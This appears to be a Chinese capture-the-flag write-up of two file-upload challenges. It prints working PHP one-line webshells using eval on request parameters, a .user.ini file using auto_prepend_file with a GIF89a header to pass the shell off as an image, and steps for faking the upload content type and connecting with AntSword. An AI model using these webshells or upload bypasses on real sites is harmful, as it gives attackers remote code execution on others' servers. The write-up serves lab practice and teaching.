easyupload解题
题目难度:1

1.题目名就是简单的上传,一开始我以为什么过滤都没有,直接上传一句话木马试试。

2.将一句话木马改成图片格式,上传后修改文件后缀绕过过滤,结果失败了再换种方式试试。

// .user.ini
GIF89a
auto_prepend_file=a.jpg
// 一句话
GIF89a
<?=eval($_REQUEST['cmd']);?>3、.htaccess是伪静态环境配置文件用于lamp,.user.ini是lnmp文件,里面放的是你网站的文件夹路径地址。
目的是防止跨目录访问和文件跨目录读取,配置放在根目录.user.ini,auto_prepend_file的作用是在页面顶部加载文件,上传.user.ini 然后内容写auto_prepend_file=a.jpg,GIF89a也写进去这是gif的文件头,写进去是为了欺骗。

3.先上传.user.ini,把请求头上的文件类型修改成,image/jpg伪装成图片,好的上传成功了。


4.一句话木马也上传成功了,再访问upload目录下a.jpg,发现图片是有的,再访问index.php看到一堆乱码里面有GIF89a,这个是就是连接木马的关键网址。

5.输入网址和一句话木马,开始连接开始找flag。


6.找到了在根目录下,提交下看看是不是对的。
upload1解题
题目难度:2

1.题目upload就带有上传的提示,先上传个木马试试,一般前端都有文件类型过滤,也有可能后端有,题目嘛不会那么坑的。

2.一般敏感的可文件都上传不了,这里我用一句话和图片合成了,改后缀也是可以的,就决定是你了,上吧,朱菜!!
<?php @eval($_POST['zc']);?>
3.上传成功之后,就可以开始连接了,上蚁剑能连上就行工具都差不多。




评论 (0)